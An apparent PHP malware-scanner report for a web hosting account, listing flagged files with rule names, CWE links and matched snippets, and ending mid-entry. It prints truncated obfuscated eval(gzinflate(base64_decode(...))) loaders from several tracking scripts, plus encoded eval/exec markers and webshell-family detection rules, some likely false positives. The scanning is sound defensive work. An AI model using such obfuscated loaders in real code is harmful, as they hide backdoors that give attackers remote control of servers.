/custdata01/kings/public_html/tracking/popout_dialer.php

Size: 1.12 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJ1U72vbOhT9nED+hxutjyQwx9230djutjSMQlnL2gfvUYpRrOtYTJE8Se4Pxv73SbKTdCXZ2PQlytW5R+den6tBf9CP43mFxRcolYZCyZKvptNBn5fjkgvM8ZEba8aEy0I0DOMOUVc1mUCaQkmFwcmg/23QB7cYxzFJltlNhRqBG6ASUGulpzAPmeBZQSrr7mskm8KVQGoQNEZcGkuFgFaHpYUF09S10naaxMuMTGaD/vdB36AxXMncgbUd+6DGrw3XmCtZ4Hi0UdpYLrzO0WHIFV1xSa1j2wKP2BJSkPgAZx8C+UqoJRVw9Hkxv/x8dv7p47ULOhw3ea1q1diccSpQuyyrGwyHcXyhHDOExoZeDrkxaMdH+fXi+vr88tPtqDGoc85Gd5Nd9+K4QspQj8mFKoKuExCeqe33rEW5T2LbVhygNijyQv2WuVDrmkqOxrOfuqRUqr2XPKP+qeRcUGNzy9c4uvPlu01o2Wk...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1U72vbOhT9nED+hxutjyQwx9230djutjSMQlnL2gfvUYpRrOtYTJE8Se4Pxv73SbKTdCXZ2PQlytW5R+den6tBf9CP43mFxRcolYZCyZKvptNBn5fjkgvM8ZEba8aEy0I0DOMOUVc1mUCaQkmFwcmg/23QB7cYxzFJltlNhRqBG6ASUGulpzAPmeBZQSrr7mskm8KVQGoQNEZcGkuFgFaHpYUF09S10naaxMuMTGaD/vdB36AxXMncgbUd+6DGrw3XmCtZ4Hi0UdpYLrzO0WHIFV1xSa1j2wKP2BJSkPgAZx8C+UqoJRVw9Hkxv/x8dv7p47ULOhw3ea1q1diccSpQuyyrGwyHcXyhHDOExoZeDrkxaMdH+fXi+vr88tPtqDGoc85Gd5Nd9+K4QspQj8mFKoKuExCeqe33rEW5T2LbVhygNijyQv2WuVDrmkqOxrO...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1U72vbOhT9nED+hxutjyQwx9230djutjSMQlnL2gfvUYpRrOtYTJE8Se4Pxv73SbKTdCXZ2PQlytW5R+den6tBf9CP43mFxRcolYZCyZKvptNBn5fjkgvM8ZEba8aEy0I0DOMOUVc1mUCaQkmFwcmg/23QB7cYxzFJltlNhRqBG6ASUGulpzAPmeBZQSrr7mskm8KVQGoQNEZcGkuFgFaHpYUF09S10naaxMuMTGaD/vdB36AxXMncgbUd+6DGrw3XmCtZ4Hi0UdpYLrzO0WHIFV1xSa1j2wKP2BJSkPgAZx8C+UqoJRVw9Hkxv/x8dv7p47ULOhw3ea1q1diccSpQuyyrGwyHcXyhHDOExoZeDrkxaMdH+fXi+vr88tPtqDGoc85Gd5Nd9+K4QspQj8mFKoKuExCeqe33rEW5T2LbVhygNijyQv2WuVDrmkqOxrO...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/keyword_locked_number.php

Size: 5.34 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAM1ce3PbNhL/3zP+DgirhtTYkmx32rtKonyu7aaeS+Kc5fQuTXwaioQk1BSpkpAfSf3dbwHwLT5ASc6VM20saLHYXSyA/S2W2t3pdC4cQolBPhNniugMIx/7PnGd3Z3gj5FPDY9qzd7uzi6Qn+EJcUJax5hj5E7Qwpji3Z0G+wfpSLnFj/euZ41s17zF1shZzsfYUwIGF45pLy3GwcEmDGF4j2hCbOzv7nj4jyXx8Mh1TIxUwglxZ0mJ3V7MFmovTaFFFO+MKXEMCsJyOiEqmWj/aNim3T9qftndQfDMsGFhT1NeuyYn7iLiWPiB9VFYH0aDHwiFP59CWZlt7Ng4Zz8hd/w7Niloa41BVwffQyO3ztR2x4aNGlfnp5dXZxdvXw17OVxcYOOhgPbO8IgxBt2BuUGR4WEUaGi1d3deBQxPTNNdOnRIrH34sKSza/cWO6GSjdHwfDi8uHz7UV1gb074pKk3/cMmCvQ+Huz...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM1ce3PbNhL/3zP+DgirhtTYkmx32rtKonyu7aaeS+Kc5fQuTXwaioQk1BSpkpAfSf3dbwHwLT5ASc6VM20saLHYXSyA/S2W2t3pdC4cQolBPhNniugMIx/7PnGd3Z3gj5FPDY9qzd7uzi6Qn+EJcUJax5hj5E7Qwpji3Z0G+wfpSLnFj/euZ41s17zF1shZzsfYUwIGF45pLy3GwcEmDGF4j2hCbOzv7nj4jyXx8Mh1TIxUwglxZ0mJ3V7MFmovTaFFFO+MKXEMCsJyOiEqmWj/aNim3T9qftndQfDMsGFhT1NeuyYn7iLiWPiB9VFYH0aDHwiFP59CWZlt7Ng4Zz8hd/w7Niloa41BVwffQyO3ztR2x4aNGlfnp5dXZxdvXw17OVxcYOOhgPbO8IgxBt2BuUGR4WEUaGi1d3deBQxPTNNdOnRIrH34sKSza/cWO6G...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAM1ce3PbNhL/3zP+DgirhtTYkmx32rtKonyu7aaeS+Kc5fQuTXwaioQk1BSpkpAfSf3dbwHwLT5ASc6VM20saLHYXSyA/S2W2t3pdC4cQolBPhNniugMIx/7PnGd3Z3gj5FPDY9qzd7uzi6Qn+EJcUJax5hj5E7Qwpji3Z0G+wfpSLnFj/euZ41s17zF1shZzsfYUwIGF45pLy3GwcEmDGF4j2hCbOzv7nj4jyXx8Mh1TIxUwglxZ0mJ3V7MFmovTaFFFO+MKXEMCsJyOiEqmWj/aNim3T9qftndQfDMsGFhT1NeuyYn7iLiWPiB9VFYH0aDHwiFP59CWZlt7Ng4Zz8hd/w7Niloa41BVwffQyO3ztR2x4aNGlfnp5dXZxdvXw17OVxcYOOhgPbO8IgxBt2BuUGR4WEUaGi1d3deBQxPTNNdOnRIrH34sKSza/cWO6G...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/manage_billing.php

Size: 11.12 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09+1fbxtI/k3PyP2xUvto+F/nFIwlg5xIeDQ0hFEjTJl+Oj2ytsRJZciUZQlr6t38z+5BW0soWkOTS7+L2BEk7O7vz2JnZ98MHjcb2iA4+kaEfkIHvDZ2zev3hA2dYfTR0XNqjn50wCquG4w3cqU0bAmQymhi12sMHfz58QOBnO7RqbPa7pyMaUOKExPIIDQI/qJNtloEgMuL5EZQz9ew6OXKpFVISUNPxwshyXcLLj6xBRMLpZOIHUX2z0e8atY2HD64ePghpGDq+1wPgIKrix4D+MXUC2vO9Aa1WZAWnkeNi9SrFIEfWmeNZEWCLARftPukQj16QnecMOWPBvxfdgbvZrgkqR9SyaVA1DvwBy71OHM+mnzkzNjgM8CviFX4IrD0C+lzfsgnjccj56oQhjaqLvZPdk5P914fvK9OQBj3HrnxQOJovy/Wh1gVlOUOiIpzQYOwwdlU+kE3SIn/9RQQpROB/1n34YDM...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09+1fbxtI/k3PyP2xUvto+F/nFIwlg5xIeDQ0hFEjTJl+Oj2ytsRJZciUZQlr6t38z+5BW0soWkOTS7+L2BEk7O7vz2JnZ98MHjcb2iA4+kaEfkIHvDZ2zev3hA2dYfTR0XNqjn50wCquG4w3cqU0bAmQymhi12sMHfz58QOBnO7RqbPa7pyMaUOKExPIIDQI/qJNtloEgMuL5EZQz9ew6OXKpFVISUNPxwshyXcLLj6xBRMLpZOIHUX2z0e8atY2HD64ePghpGDq+1wPgIKrix4D+MXUC2vO9Aa1WZAWnkeNi9SrFIEfWmeNZEWCLARftPukQj16QnecMOWPBvxfdgbvZrgkqR9SyaVA1DvwBy71OHM+mnzkzNjgM8CviFX4IrD0C+lzfsgnjccj56oQhjaqLvZPdk5P914fvK9OQBj3HrnxQOJovy/Wh1gVlOUO...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09+1fbxtI/k3PyP2xUvto+F/nFIwlg5xIeDQ0hFEjTJl+Oj2ytsRJZciUZQlr6t38z+5BW0soWkOTS7+L2BEk7O7vz2JnZ98MHjcb2iA4+kaEfkIHvDZ2zev3hA2dYfTR0XNqjn50wCquG4w3cqU0bAmQymhi12sMHfz58QOBnO7RqbPa7pyMaUOKExPIIDQI/qJNtloEgMuL5EZQz9ew6OXKpFVISUNPxwshyXcLLj6xBRMLpZOIHUX2z0e8atY2HD64ePghpGDq+1wPgIKrix4D+MXUC2vO9Aa1WZAWnkeNi9SrFIEfWmeNZEWCLARftPukQj16QnecMOWPBvxfdgbvZrgkqR9SyaVA1DvwBy71OHM+mnzkzNjgM8CviFX4IrD0C+lzfsgnjccj56oQhjaqLvZPdk5P914fvK9OQBj3HrnxQOJovy/Wh1gVlOUO...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/keyword_not_generated_call_report.php

Size: 5.46 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO0ca3PbNvK7Z/wfEFYpqbEedjpt7yxTvtR208w1j7Od3qWJTwORkISaIlUSsq20/u+3C/ABSqREyu7jbg4ziSVwd7G7WCx2F6B2d7rdlz4XnPJP3B8TMWEkYlHEA393J/4wiAQNhdXs7e7sAvgpG3E/gfXplJFgRGZ0zHZ3GviH2MS4ZovbIHQHfiAGY+azkArmDhzqeYOQzYJQGDGxl77jzV2k5jMHhqPhgoy4x6LdnZD9POchGwS+w4jJJSDrzgX3OrPJzOzlIawU4i0dc58KYFzCKbb5yPpbw3O8o2fNX3Z3CLQJoy4LLeP7wJHAh4T7LrtDHANxEIbdcQEf7xNeUU9epqjTb0gw/Ik5AiR3hyC3z26hU2pq7AVD6pHG+dnJm/PTl69fXPQKqARAJiQx7A0NOR2C7ECcCkJDRmIJ3c7uzouY4HPHCea+uOBuC77MxeQyuGZ+ImRjcHF2cfHyzesP5oyFUy4n0Lw...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0ca3PbNvK7Z/wfEFYpqbEedjpt7yxTvtR208w1j7Od3qWJTwORkISaIlUSsq20/u+3C/ABSqREyu7jbg4ziSVwd7G7WCx2F6B2d7rdlz4XnPJP3B8TMWEkYlHEA393J/4wiAQNhdXs7e7sAvgpG3E/gfXplJFgRGZ0zHZ3GviH2MS4ZovbIHQHfiAGY+azkArmDhzqeYOQzYJQGDGxl77jzV2k5jMHhqPhgoy4x6LdnZD9POchGwS+w4jJJSDrzgX3OrPJzOzlIawU4i0dc58KYFzCKbb5yPpbw3O8o2fNX3Z3CLQJoy4LLeP7wJHAh4T7LrtDHANxEIbdcQEf7xNeUU9epqjTb0gw/Ik5AiR3hyC3z26hU2pq7AVD6pHG+dnJm/PTl69fXPQKqARAJiQx7A0NOR2C7ECcCkJDRmIJ3c7uzouY4HPHCea+uOBuC77...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO0ca3PbNvK7Z/wfEFYpqbEedjpt7yxTvtR208w1j7Od3qWJTwORkISaIlUSsq20/u+3C/ABSqREyu7jbg4ziSVwd7G7WCx2F6B2d7rdlz4XnPJP3B8TMWEkYlHEA393J/4wiAQNhdXs7e7sAvgpG3E/gfXplJFgRGZ0zHZ3GviH2MS4ZovbIHQHfiAGY+azkArmDhzqeYOQzYJQGDGxl77jzV2k5jMHhqPhgoy4x6LdnZD9POchGwS+w4jJJSDrzgX3OrPJzOzlIawU4i0dc58KYFzCKbb5yPpbw3O8o2fNX3Z3CLQJoy4LLeP7wJHAh4T7LrtDHANxEIbdcQEf7xNeUU9epqjTb0gw/Ik5AiR3hyC3z26hU2pq7AVD6pHG+dnJm/PTl69fXPQKqARAJiQx7A0NOR2C7ECcCkJDRmIJ3c7uzouY4HPHCea+uOBuC77...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/leave_a_message.php

Size: 1.16 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAK1V22rjSBB9diD/UAhDSxBbk5mXZY095PYwkJDZXNiHEERLqsjNSN2a7pYvTPbfpy+SZSfZXNg1GEnVp6rOqa7u2t/b35P4s2ESE8EzDAnjWdnkGGeCP7BiXM9rEk3+DZSnbwCuUS5Yhiq+WbKSiTfQ2oGSOdIc5Qa7vzfMU5gCxyWcHofe5DFhcCK4Rq5HN+sa/wSNKx2vqjLwIPYAodKyRB4Ok6uzv27Prm/uiMEgJ/dRBL/29wZD92nCP0dM7HJFWZmKlQXk6WhWoL7wltB7+kyDOBaNrhsNRujFOWgBEjMhc9BzhAqVogXacBJVLbjCVk9Xn8TXxz6q0kmM4x48mim6Dsk50gUC7cLBg5BAYAwdxzuSo8rIvTERoNqlThG7Kg6GmahqyteJQq0ZL9SWqBO/dN2u7IqzdXzmPJothKFucyfaVB9gOgVyY/wIuNJC+xuWlBeNJWzSvRrF+CYdeLIVwEHe5e0+Jy/...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1V22rjSBB9diD/UAhDSxBbk5mXZY095PYwkJDZXNiHEERLqsjNSN2a7pYvTPbfpy+SZSfZXNg1GEnVp6rOqa7u2t/b35P4s2ESE8EzDAnjWdnkGGeCP7BiXM9rEk3+DZSnbwCuUS5Yhiq+WbKSiTfQ2oGSOdIc5Qa7vzfMU5gCxyWcHofe5DFhcCK4Rq5HN+sa/wSNKx2vqjLwIPYAodKyRB4Ok6uzv27Prm/uiMEgJ/dRBL/29wZD92nCP0dM7HJFWZmKlQXk6WhWoL7wltB7+kyDOBaNrhsNRujFOWgBEjMhc9BzhAqVogXacBJVLbjCVk9Xn8TXxz6q0kmM4x48mim6Dsk50gUC7cLBg5BAYAwdxzuSo8rIvTERoNqlThG7Kg6GmahqyteJQq0ZL9SWqBO/dN2u7IqzdXzmPJothKFucyfaVB9gOgVyY/wIuNJ...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAK1V22rjSBB9diD/UAhDSxBbk5mXZY095PYwkJDZXNiHEERLqsjNSN2a7pYvTPbfpy+SZSfZXNg1GEnVp6rOqa7u2t/b35P4s2ESE8EzDAnjWdnkGGeCP7BiXM9rEk3+DZSnbwCuUS5Yhiq+WbKSiTfQ2oGSOdIc5Qa7vzfMU5gCxyWcHofe5DFhcCK4Rq5HN+sa/wSNKx2vqjLwIPYAodKyRB4Ok6uzv27Prm/uiMEgJ/dRBL/29wZD92nCP0dM7HJFWZmKlQXk6WhWoL7wltB7+kyDOBaNrhsNRujFOWgBEjMhc9BzhAqVogXacBJVLbjCVk9Xn8TXxz6q0kmM4x48mim6Dsk50gUC7cLBg5BAYAwdxzuSo8rIvTERoNqlThG7Kg6GmahqyteJQq0ZL9SWqBO/dN2u7IqzdXzmPJothKFucyfaVB9gOgVyY/wIuNJ...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/listen.php

Size: 1.10 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAJ1VS2/TQBA+J1L+w8iKGltNE9KKC5BURS23IqDlgEplufbYWbB3zXqdtkL978zu+hWcPuCS7M7O8/tmxqPhaCjxV8kk+oKH6E4YD9MywnkoeMySWb7OJ97bx5Sim2cULlBuWIjF/PKWpUw02uPoBpbA8RZO37taQKKYyUKRVMkSjYTF4BZKpsjdsf/l7PPXs4vLqwneKeSTa8+D36PhYGyuy/47eXgATAu0ahKLXHC62ah1Xr7NS/9lqUmkVT1YFcG965xwQCmFBBGGpcQIGAe1RtgIcpAFLIXivlCYOcY6YujqpBlPPGhc6acHU2SGRREkWFAegZTk36ChhApSv/P26gkAarUWg6xI/JQZ8HbqmbI63nOJiV/kKVOuM5/Onelu78asl1ooSq7cxl1bGqEjkSufsqkq2J1/R68tYdv4MW2TUd0ncUDs1tF3hzplCVMdoCJz3w5Q6xjEByx2G60lLDxtNpjPi58sp1P...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1VS2/TQBA+J1L+w8iKGltNE9KKC5BURS23IqDlgEplufbYWbB3zXqdtkL978zu+hWcPuCS7M7O8/tmxqPhaCjxV8kk+oKH6E4YD9MywnkoeMySWb7OJ97bx5Sim2cULlBuWIjF/PKWpUw02uPoBpbA8RZO37taQKKYyUKRVMkSjYTF4BZKpsjdsf/l7PPXs4vLqwneKeSTa8+D36PhYGyuy/47eXgATAu0ahKLXHC62ah1Xr7NS/9lqUmkVT1YFcG965xwQCmFBBGGpcQIGAe1RtgIcpAFLIXivlCYOcY6YujqpBlPPGhc6acHU2SGRREkWFAegZTk36ChhApSv/P26gkAarUWg6xI/JQZ8HbqmbI63nOJiV/kKVOuM5/Onelu78asl1ooSq7cxl1bGqEjkSufsqkq2J1/R68tYdv4MW2TUd0ncUDs1tF3hzplCVM...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAJ1VS2/TQBA+J1L+w8iKGltNE9KKC5BURS23IqDlgEplufbYWbB3zXqdtkL978zu+hWcPuCS7M7O8/tmxqPhaCjxV8kk+oKH6E4YD9MywnkoeMySWb7OJ97bx5Sim2cULlBuWIjF/PKWpUw02uPoBpbA8RZO37taQKKYyUKRVMkSjYTF4BZKpsjdsf/l7PPXs4vLqwneKeSTa8+D36PhYGyuy/47eXgATAu0ahKLXHC62ah1Xr7NS/9lqUmkVT1YFcG965xwQCmFBBGGpcQIGAe1RtgIcpAFLIXivlCYOcY6YujqpBlPPGhc6acHU2SGRREkWFAegZTk36ChhApSv/P26gkAarUWg6xI/JQZ8HbqmbI63nOJiV/kKVOuM5/Onelu78asl1ooSq7cxl1bGqEjkSufsqkq2J1/R68tYdv4MW2TUd0ncUDs1tF3hzplCVM...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/tracking/pool_edit.php

Size: 6.33 kB Created: 2016-02-18 21:32:00 Modified: 2017-03-25 00:03:49 Warns: 2 Dangers: 2
DescriptionMatch

Exploit base64_long Line: 3 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'H4sIAAAAAAAEAO09a3PbNrbfM5P/gNDeSym2HvbdNruypaxje7q+k8SZ2pnejuPRUCQksaFIXhL0o5389z0HD4miKRKk5CTtNTrTSBBwcHBw3nj4+bNO58x3mWu5v7v+hLApJTGNYzfwnz+TH4YxsyLWaB48f/Ycmp/Qseurtr41oyQYk9Ca0OfPtvEf0idGGATekDouM2SnM9/2Egd7+dQGsFZ0T8auR+PnzyL6f4kb0WHg25SYLm9IOwlzvXY4DU0OwB03/rXt2d7hfvOP588IlCm1HBo1jLeBbTFAskdc36F32MVATLENvXMZfPyiUMBpeot5nrwhweg3ajNA3BkB2j69hUo+0YkXjCyPbP98enz+88nZ+58uDnKgBAAmIrLtjRW51gimBMAtRqyIEjk1p/382U8S4JFtB4nPLlxnF74kbHoZfKa+muT28OL04uLs/P2VGdJo5nL6m9eHe00i5/168PzZYWxHbsgIuw9p32D0jnV...

Exploit execution Line: 3 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3PbNrbfM5P/gNDeSym2HvbdNruypaxje7q+k8SZ2pnejuPRUCQksaFIXhL0o5389z0HD4miKRKk5CTtNTrTSBBwcHBw3nj4+bNO58x3mWu5v7v+hLApJTGNYzfwnz+TH4YxsyLWaB48f/Ycmp/Qseurtr41oyQYk9Ca0OfPtvEf0idGGATekDouM2SnM9/2Egd7+dQGsFZ0T8auR+PnzyL6f4kb0WHg25SYLm9IOwlzvXY4DU0OwB03/rXt2d7hfvOP588IlCm1HBo1jLeBbTFAskdc36F32MVATLENvXMZfPyiUMBpeot5nrwhweg3ajNA3BkB2j69hUo+0YkXjCyPbP98enz+88nZ+58uDnKgBAAmIrLtjRW51gimBMAtRqyIEjk1p/382U8S4JFtB4nPLlxnF74kbHoZfKa+muT28OL04uLs/P2VGdJo5nL...

Function eval Line: 3 Warning

Potentially dangerous function `eval`

[https://www.php.net/eval]

<?php eval(gzinflate(substr(base64_decode('H4sIAAAAAAAEAO09a3PbNrbfM5P/gNDeSym2HvbdNruypaxje7q+k8SZ2pnejuPRUCQksaFIXhL0o5389z0HD4miKRKk5CTtNTrTSBBwcHBw3nj4+bNO58x3mWu5v7v+hLApJTGNYzfwnz+TH4YxsyLWaB48f/Ycmp/Qseurtr41oyQYk9Ca0OfPtvEf0idGGATekDouM2SnM9/2Egd7+dQGsFZ0T8auR+PnzyL6f4kb0WHg25SYLm9IOwlzvXY4DU0OwB03/rXt2d7hfvOP588IlCm1HBo1jLeBbTFAskdc36F32MVATLENvXMZfPyiUMBpeot5nrwhweg3ajNA3BkB2j69hUo+0YkXjCyPbP98enz+88nZ+58uDnKgBAAmIrLtjRW51gimBMAtRqyIEjk1p/382U8S4JFtB4nPLlxnF74kbHoZfKa+muT28OL04uLs/P2VGdJo5nL...

Sign 80e70adc Dangerous

Malware Signature (hash: 80e70adc)

<?php <?php  eval

/custdata01/kings/public_html/wp-content/themes/Divi/includes/builder/feature/display-conditions/DisplayConditions.php

Size: 19.49 kB Created: 2022-05-17 00:17:54 Modified: 2022-05-17 00:17:54 Dangers: 2
DescriptionMatch

Exploit execution Line: 370 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php base64_decode( $_COOKIE['divi_post_visit'] )

Exploit execution Line: 462 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php base64_decode( $_COOKIE['divi_module_views'] )

/custdata01/kings/public_html/wp-content/themes/Divi/includes/builder/module/field/display-conditions/NumberOfViews.php

Size: 2.41 kB Created: 2022-05-17 00:17:54 Modified: 2022-05-17 00:17:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 39 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php base64_decode( $_COOKIE['divi_module_views'] )

/custdata01/kings/public_html/wp-content/themes/Divi/includes/builder/module/field/display-conditions/PageVisit.php

Size: 1.96 kB Created: 2022-05-17 00:17:54 Modified: 2022-05-17 00:17:54 Dangers: 1
DescriptionMatch

Exploit execution Line: 43 Dangerous

RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP

[https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]

<?php base64_decode( $_COOKIE['divi_post_visit'] )

/custdata01/kings/public_html/wp-content/themes/Divi/includes/builder/class-et-builder-element.php

Size: 890.89 kB Created: 2022-05-17 00:17:54 Modified: 2022-05-17 00:17:54 Warns: 3 Dangers: 1
DescriptionMatch

Exploit double_var2 Line: 1243 Warning

Double var technique is usually used for the obfuscation of malicious code

<?php ${$name}

Exploit double_var2 Line: 1257 Warning

Double var technique is usually used for the obfuscation of malicious code

<?php ${$new_prop}

Exploit double_var2 Line: 1326 Warning

Double var technique is usually used for the obfuscation of malicious code

<?php ${$replacement}

Sign e996cf12 Line: 21022 Dangerous

Malware Signature (hash: e996cf12)

<?php ${label_css_format}(${

/custdata01/kings/public_html/wp-content/themes/Divi/includes/builder/class-et-builder-module-shortcode-manager.php

Size: 20.84 kB Created: 2022-05-17 00:17:54 Modified: 2022-05-17 00:17:54 Dangers: 1
DescriptionMatch

Exploit nano Line: 706 Dangerous

Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient

[https://github.com/s0md3v/nano]

<?php $module['classname']()

/custdata01/kings/public_html/wp-content/wflogs/rules.php

Size: 662.85 kB Created: 2024-06-06 13:50:31 Modified: 2024-06-13 00:57:59 Dangers: 1
DescriptionMatch

Sign d30fc49e Line: 1401 Dangerous

Malware Signature (hash: d30fc49e)

<?php backdoor

/custdata01/kings/public_html/wp-content/wflogs/config-transient.php

Size: 1.46 MB Created: 2024-06-06 13:50:35 Modified: 2024-06-13 00:57:59 Warns: 2 Dangers: 5
DescriptionMatch

Exploit base64_long Line: 6 Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php "X5iE4ehqpiAXx352hUPL6iOk7eZfpELUCq5R7RTPBukCGEdkp2F/Rj9H6uWpOEoDU0FFTcnG44fOFAW2SgNDbPWITYZRBFVQfxIuESVjPdyIOELmxRqdpGR4bLAe+3DZhNl7JGSRI103sLk0HZNjBitoN4vdttkMcnNs1fpegtBCHS9cMvVZ+niwn52SdemnFYeb8zO6HViBAzhrILmy9QCS1xewzRWu9LHZbj/yTGvugOWvZPWQ06mEOry2dGHBdvSD3CxUg2ansIjQumCRPQeI4AY/bIAy6bc4F+tpUV0JUiCJXD5NrRd2/TczOWwygqe9huepVd368SIVJ4A5lg=="

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php "ImwSMyZwHlVYOQwSBHt2FnMSKVBaai5fblxcAi5iKg1hNy0hLjpkeXwTdlprfWo2anVrFB8JfTJoEnkXETcRdlVscjNeIzFidz08ESAXbmdzZ2pDEBQuDlFpGAIuZCpzHHwCDmUSGnl2E3ZQcBN5VndlFhRhM1IyFmx5ZRFJNXYlEgAzWBNMYXRMDGwgaRpnARJzBGAULnAdaRgCUBYqfxx8AnAXEhZ5dnl2XHBtCygJZRoUH3x9TGgSeRdjN0tgJWxyM1QTTGJ0QAwSUhdkZw0SDU9gFC4Ob2kUAlAWVA0ccAJwLytkBwgTBCIObQcodxdkaiAOAzJoHnlpIjdLCCVgck0mbTJhBj5yEl4XGhVzbA1DYGpccBFpGAIuZCpzHHwCDmUSGkEIbXYiAm0HKAllZGYfcH1MaGwLF283SwglYHJNHxNMHwRAPyAaOXAPcD8jEV5HAA4fF2YCVj4eODMBODsnK2R5ayBaQ1xZVR1FX1dqb3A...

Function str_rot13 eval_str_rot13 Line: 6 Dangerous

Encoded Function `eval`

[https://www.php.net/eval]

<?php RINy

Function strrev exec_strrev Line: 6 Dangerous

Encoded Function `exec`

[https://www.php.net/exec]

<?php CEXE

Sign ae7830db Line: 6 Dangerous

Malware Signature (hash: ae7830db)

<?php Y2Hy

Sign de12c454 Line: 6 Dangerous

Malware Signature (hash: de12c454)

<?php VjAg

Sign ee1cb326 Line: 6 Dangerous

Malware Signature (hash: ee1cb326)

<?php 9wZW

/custdata01/kings/.cpaddons_upgrade/wp-admin/includes/class-pclzip.php

Size: 191.12 kB Created: 2016-05-11 21:37:30 Modified: 2017-03-24 23:55:02 Dangers: 5
DescriptionMatch

Exploit nano Line: 2626 Dangerous

